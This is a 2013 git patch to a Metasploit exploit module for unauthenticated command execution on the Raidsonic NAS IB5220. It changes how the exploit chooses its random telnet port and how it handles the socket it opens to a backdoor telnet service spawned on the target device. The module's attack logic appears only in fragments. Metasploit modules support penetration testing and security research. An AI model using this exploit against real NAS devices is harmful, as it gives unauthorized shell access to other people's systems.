From 926ddf35bc2b1505fa430edd98a454827ce4318f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 19 Sep 2013 08:23:25 -0500 Subject: [PATCH] Fix possible collisions on binding port and handle rex socket --- .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 19f35eedde..ea03679036 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - telnet_port = rand(65535) + telnet_port = rand(32767) + 32768 print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") @@ -124,12 +124,15 @@ class Metasploit3 < Msf::Exploit::Remote end print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end + add_socket(sock) + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil?